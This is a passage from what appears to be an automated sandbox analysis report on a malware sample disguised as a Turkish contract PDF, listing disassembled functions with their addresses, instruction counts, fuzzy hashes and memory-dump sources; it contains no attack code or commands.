                              • Opcode Fuzzy Hash: 7baa6ec0099ae9d85423f7b440f33b203121b93f5044af8ea53f8e0e1849ab30
                              • Instruction Fuzzy Hash: 41320374A04764AFEB14CF69C850BAEB7F2FF84344F20811DDC659B284DB76A84ACB50
                              Function 32C5124C Relevance: .6, Instructions: 571COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d088342af2fdd10569da7d962c0631edee8e651ed94ab62766f31aa60947189
                              • Instruction ID: cdc63b13135400e21c8a24cfe257a36c1f5405f64879c459db0cd6e446083f46
                              • Opcode Fuzzy Hash: 6d088342af2fdd10569da7d962c0631edee8e651ed94ab62766f31aa60947189
                              • Instruction Fuzzy Hash: 7A22B178A002168FDB09CF5AC494AAEB3F2FF88B44F64816DD855DB345DB70E942CB94
                              Function 32B88347 Relevance: .4, Instructions: 380COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 527be986bd54547735a104ef410251188b6344cecb4f34536a18958ad89f7598
                              • Instruction ID: b283b3f08270804ab229d24edbaceb501412d702d2e684ef0c98133dd8b1c522
                              • Opcode Fuzzy Hash: 527be986bd54547735a104ef410251188b6344cecb4f34536a18958ad89f7598
                              • Instruction Fuzzy Hash: 97D1E476A0035ADBEB08CF64E881FAA73B5FF54348F488129E91ADB290EF74D945C750
                              Function 32B9D700 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ad9e19e701c062e9d7871394b53b5afdfd3d869bc4a144eb9cc57cfc9aacc0bd
                              • Instruction ID: 018d4efe29169adb31ffe8638aaf31000643ad3e36aa6009bc3e81d5e13b61e8
                              • Opcode Fuzzy Hash: ad9e19e701c062e9d7871394b53b5afdfd3d869bc4a144eb9cc57cfc9aacc0bd
                              • Instruction Fuzzy Hash: 67C12374E00266AFEB18DF59C840BDEB7B1EF44358F158269E815AB380DB71E945CB90
                              Function 32BD1763 Relevance: .3, Instructions: 322COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0fdee3d81859e7981ea022b751eb1ebf5a131dde48e300c125da62e33e7b4407
                              • Instruction ID: c66d743752e30d5440e1304c41b2692247d40365f592cea5ecf58f64968f7670
                              • Opcode Fuzzy Hash: 0fdee3d81859e7981ea022b751eb1ebf5a131dde48e300c125da62e33e7b4407
                              • Instruction Fuzzy Hash: 88D104B5901604DFDB55CF68C980B9ABBE9FF48744F0480BAED09DB216DB71D905CBA0
                              Function 32BAF380 Relevance: .3, Instructions: 321COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70855e9f6fba9d478c60a304468c06537c5fa6567a47a40a2f7b67d1f9c5890c
                              • Instruction ID: 044c3050fe448afb73964aead69506effbb7b9812e8bb085d273570b5ff71a12
                              • Opcode Fuzzy Hash: 70855e9f6fba9d478c60a304468c06537c5fa6567a47a40a2f7b67d1f9c5890c
                              • Instruction Fuzzy Hash: BAC1F5B5A09725CBEB28CF18C4A07F977A1FF48744F598159DC42AB392DB35C941CBA0
                              Function 32B937E4 Relevance: .3, Instructions: 303COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26493dddc0ee5ef914e61a330121b2e8c3f01bd8d3125ce0ba06abeb29d94bac
                              • Instruction ID: 179d2184ba16fb1fbd8fb8c44029eb0da5e30b1789ef45ed0a1261885dd90216
                              • Opcode Fuzzy Hash: 26493dddc0ee5ef914e61a330121b2e8c3f01bd8d3125ce0ba06abeb29d94bac
                              • Instruction Fuzzy Hash: DDC134B19016499FDB15DFA8D880BDEBBF4FF48744F10852AE41AAB350EB34A901CF60
                              Function 32BA0445 Relevance: .3, Instructions: 300COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                              • Instruction ID: 635024b251996b3c78ab0f2f05d9408ffcc807f4a783deef9a654bca3bf00cf6
                              • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                              • Instruction Fuzzy Hash: EDB13235608755AFEB19CBA8C8A0BAEBBF6EF84304F140959DA519B281DF70ED44CB50
                              Function 32B982E0 Relevance: .3, Instructions: 281COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cbc44224fe85c74de3ba0f0b77eb8970faa8e59e8e6c78612ef6294703c4409e
                              • Instruction ID: db13966e1fe247ed28f691f17907e79dde0994d5f380494a6d22ce9091fbd2d8
                              • Opcode Fuzzy Hash: cbc44224fe85c74de3ba0f0b77eb8970faa8e59e8e6c78612ef6294703c4409e
                              • Instruction Fuzzy Hash: 50C157742083808FE764CF18C494BABB7E4FF88748F44496DE99997291DB75E908CF92
                              Function 32B8C3C7 Relevance: .3, Instructions: 280COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bcb15b20c3265037e641db8fac4141c1ce4861e483ffa6841599ba01743e96ad
                              • Instruction ID: f992649fb8ba042444b645fe5a94a18950ca2c9d981cd7c6edaf50743c2f27c1
                              • Opcode Fuzzy Hash: bcb15b20c3265037e641db8fac4141c1ce4861e483ffa6841599ba01743e96ad
                              • Instruction Fuzzy Hash: DFB170B4A006A58BEB68CF64C890BA9B3F1EF44744F0485EAD54EA7241EB70DDC5CB61
                              Function 32BD00A5 Relevance: .3, Instructions: 276COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e4aaaaca09ca31c0a326e8cf7a6e44d5d727f363d53ff9b79d5fb546bdf1ec45
                              • Instruction ID: 578d2eb6b8355dfe4ee3acae6612fef062b846a857486f03b7a75372d39df7dd
                              • Opcode Fuzzy Hash: e4aaaaca09ca31c0a326e8cf7a6e44d5d727f363d53ff9b79d5fb546bdf1ec45
                              • Instruction Fuzzy Hash: EBA1DD74B017169FEB18CFA5C980BEAB7B1FF88754F408529E945E7281EB74E841CB80
                              Function 32C64080 Relevance: .3, Instructions: 275COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c05ea20eacfb98b6eba2c962ae11f0517c18e6edc7c0a200c34f469a6047fca
                              • Instruction ID: e25678bbeff9c2fb64defc07fa384eda99bb447f54e2d4687ef4823db8fb4698
                              • Opcode Fuzzy Hash: 8c05ea20eacfb98b6eba2c962ae11f0517c18e6edc7c0a200c34f469a6047fca
                              • Instruction Fuzzy Hash: FEA1CDB2604651EFD325CF14C980FAAB7E9FF88708F584928E989EB650C774EC51CB90
                              Function 32BAE310 Relevance: .3, Instructions: 261COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 87b7d610294d91847f6acb031f7b222b813a58d4c5e8f03cc810b0ba8245b722
                              • Instruction ID: ee35137c2c32af8cec65fe663615148d99a939b7790769e6e83ecfa82f44f285
                              • Opcode Fuzzy Hash: 87b7d610294d91847f6acb031f7b222b813a58d4c5e8f03cc810b0ba8245b722
                              • Instruction Fuzzy Hash: AA914375E08B64DBE7158B28C8A0B6E77F5EF88748F158069EC009B280EF359D41CBA1
                              Function 32B993A6 Relevance: .3, Instructions: 259COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2d4175bb56b1c57fa36c83c0515c44ee3c73cec5bf906df14b5052937503f66
                              • Instruction ID: b82882d5f4e1bd0b5da1f2fa40b6c5f2622da6218fa240fddd4b428443aff0bc
                              • Opcode Fuzzy Hash: f2d4175bb56b1c57fa36c83c0515c44ee3c73cec5bf906df14b5052937503f66
                              • Instruction Fuzzy Hash: 92B16CB8901B55CFEB65CF58C8407D9B7A0FF09358F54856ED8219B392DB32D982CB90
                              Function 32B97290 Relevance: .2, Instructions: 247COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7b05c14706538086129498a62f91f2f3d5e57f48b454ebe5e6c780867f3ffc9
                              • Instruction ID: 19e0cdf9dc8d82f33af9b38d6d7763271cf220c34a208c76448216e4ee9b6659
                              • Opcode Fuzzy Hash: d7b05c14706538086129498a62f91f2f3d5e57f48b454ebe5e6c780867f3ffc9
                              • Instruction Fuzzy Hash: F9A159B5608342DFE314CF28C480A5ABBF5FF89744F24896DE9849B351EB70E945CB92
                              Function 32C4B0AF Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                              • Instruction ID: d3a788a59fdc1d8c09ce8464ffb956293f6b4fbbd47e14cc6344042a3f0c8fdb
                              • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                              • Instruction Fuzzy Hash: 9071D175E0061A9BDB15CF66C880BAFB7B9BF84798F90411AEC04EB244EF34D981C790
                              Function 32BCE1A4 Relevance: .2, Instructions: 212COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8867a712ea868e850f803569cedcd51fa048c01b848e06f6559d5ae9e5569af4
                              • Instruction ID: 9a5dc2cf496765840d6c11ee3fb6c8373cc661134549ba13cb6ae8d762d38417
                              • Opcode Fuzzy Hash: 8867a712ea868e850f803569cedcd51fa048c01b848e06f6559d5ae9e5569af4
                              • Instruction Fuzzy Hash: B5816B75A00769EFEB15CFA4D880BDEB7B9FF88354F108429E955A7210DB30AC45CBA0
                              Function 32B977F9 Relevance: .2, Instructions: 164COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 95ab326d32b1b51fd8452d267246f2afdcef36fa8417fc05bbd10df8f3a8564b
                              • Instruction ID: a91caebae18f76c2aba5580a66f586195377849e6d9f62fb5948d202ecbe3ed1
                              • Opcode Fuzzy Hash: 95ab326d32b1b51fd8452d267246f2afdcef36fa8417fc05bbd10df8f3a8564b
                              • Instruction Fuzzy Hash: FA516AB4A08351DFD314CF29C4C0A1ABBE5FB88744F50496EEA9997354DB70E844CB92
                              Function 32B8B273 Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 799c48ba20eb7343aed4e2ff6cbdcc3fbffc6d8cca131745a95868ac49fe311a
                              • Instruction ID: 94e601ca6355e4fd6f83c580351a08352fb020b04b137af613c1aa2232c57ff1
                              • Opcode Fuzzy Hash: 799c48ba20eb7343aed4e2ff6cbdcc3fbffc6d8cca131745a95868ac49fe311a
                              • Instruction Fuzzy Hash: C141F2712407509FD71A8F29D940F1AB7A9EF44754F11C42AE96DDB390DBB0D842CB90
                              Function 32BCB490 Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00a960dff8ab5f1c9fbf7b623a788bd7db90aa1a8a23b92970764b869db17c37
                              • Instruction ID: 60186645e922a322a0fb8fa7bbab44ac4f704be385091f1202b3a3c188fc6693
                              • Opcode Fuzzy Hash: 00a960dff8ab5f1c9fbf7b623a788bd7db90aa1a8a23b92970764b869db17c37
                              • Instruction Fuzzy Hash: 895105B15003419BE724DF64CC80FAB37A8EF84764F004A2DFA5597292DB74D845CBA1
                              Function 32BB94FA Relevance: .2, Instructions: 160COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 4814f74b106794944d95a1a494461370ab9808c71b9f343d95c046f5d3b7c463
                              • Instruction ID: 0d633598f9c50ec05d458ef4ac513f68b5df1f187d7bbfc268916bfe378cbf86
                              • Opcode Fuzzy Hash: 4814f74b106794944d95a1a494461370ab9808c71b9f343d95c046f5d3b7c463
                              • Instruction Fuzzy Hash: 9F516C75944759ABEF218FB4CC80FEDBBB4EF05344F604129EAA4A7152DBB28948DF10
                              Function 32BA3660 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 88529bab0b2e76d447427e3003fc6d3b54ccf6c36b57a88b8970ff8838b9dca3
                              • Instruction ID: 67ed90ef9033ac65e079fbce36ca27659bbda8c22940009a288aa937f4ee09e3
                              • Opcode Fuzzy Hash: 88529bab0b2e76d447427e3003fc6d3b54ccf6c36b57a88b8970ff8838b9dca3
                              • Instruction Fuzzy Hash: C65123B9A09665AFD301CF68C890B69B7B0FF04310F404265EC44DB740EB35E995CBE0
                              Function 32BCE363 Relevance: .2, Instructions: 158COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4b67a4ba5568473ab57c498a2b45a573af7e232c4491da0c3bba37e1b3208a5a
                              • Instruction ID: 98aff9abbf3664f62bc967d2dc8a651278078152592d2b1dc44a064fa6704500
                              • Opcode Fuzzy Hash: 4b67a4ba5568473ab57c498a2b45a573af7e232c4491da0c3bba37e1b3208a5a
                              • Instruction Fuzzy Hash: 29519A71200A14DFD722DFA4C990F9AB3FEFF48784F44482AEA5193260CB70E941CBA0
                              Function 32BB44D1 Relevance: .2, Instructions: 156COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                              • Instruction ID: 4515170f5e358a0d80b4a1e0c8bd3f824e71ea165f949152220e33c5d49511a5
                              • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                              • Instruction Fuzzy Hash: 4A513C75E00219ABDF158FA4C860FEEBBB9FF48754F0441A9E901AB240DB74DE45CBA1
                              Function 32C586A8 Relevance: .2, Instructions: 152COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24c5f8f820361e4dd4ded30f06c6c97b028d3bbcd7f77305c660e75251b2e60f
                              • Instruction ID: 9896d7c16e76fcda3684dc6879fa345a31feb5dd4843e1a252c30e96b0870323
                              • Opcode Fuzzy Hash: 24c5f8f820361e4dd4ded30f06c6c97b028d3bbcd7f77305c660e75251b2e60f
                              • Instruction Fuzzy Hash: 6C41E475700A099BDB15CA2BD890B6BB79AFFC07A4F608319FC15C7280DF74D881C699
                              Function 32B9510D Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b14fa2ec1389278fc9af953267ed6a7e3fb5da4b61606c38d65e8a936266b0b4
                              • Instruction ID: 39f315d1a80ba8725b402f09a6a713d3aab99ddb1787f809f516711874f78aed
                              • Opcode Fuzzy Hash: b14fa2ec1389278fc9af953267ed6a7e3fb5da4b61606c38d65e8a936266b0b4
                              • Instruction Fuzzy Hash: 54516C75A85329AFEB15CFA8C840BDDB3B4EF08794F104529E940FB251DBB5A984CB60
                              Function 32BCF63F Relevance: .1, Instructions: 143COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
